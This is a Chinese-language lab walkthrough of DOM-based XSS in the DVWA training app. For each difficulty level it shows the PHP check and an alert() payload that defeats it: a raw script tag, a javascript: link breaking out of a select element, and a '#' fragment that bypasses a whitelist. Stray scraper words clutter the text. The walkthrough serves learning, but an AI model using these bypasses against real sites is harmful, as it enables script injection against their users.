XSS-DOM

DOM型XSS是基于DOM文档对象模型的一种漏洞javascript

经过 HTML DOM,树中的全部节点都可经过 JavaScript 进行访问。全部 HTML 元素(节点)都可被修改,也能够建立或删除节点。(引用W3C)php

由于能够在DOM树中植入js代码,所以形成了XSS-DOM漏洞,因此DOM类型的XSS多是反射型也多是储存型前端

 

Lowjava

<?php

# No protections, anything goes

?> 

没有PHP代码,直接看前端服务器

构造payloadxss

?default=<script>alert('xss')</script

成功执行ide

 

Medium函数

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];
    
    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {
        header ("location: ?default=English");
        exit;
    }
}

?> 

stripos函数 找查字符在字符串中第一次出现的位置测试

若是$default 出现<script,则默认?default=English编码

咱们能够用采用JavaScript伪协议

?default=</option></select><a href="javascript:alert('xss')">test</a>

 

High

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {

    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }
}

?> 

switch语句选出了对应的结果(白名单),其余的字符默认为English

payload :

?default=English #<script>alert(/xss/)</script>

 由于在URL栏中#以后的字符不会提交到服务器,就实现绕过白名单

 

Impossible

<?php

# Don't need to do anything, protction handled on the client side

?> 

不须要作任何事情,在客户端处理保护

测试输入 <script>alert('xss')</script>

被解释URL编码,从而防止js代码执行

相关文章
相关标签/搜索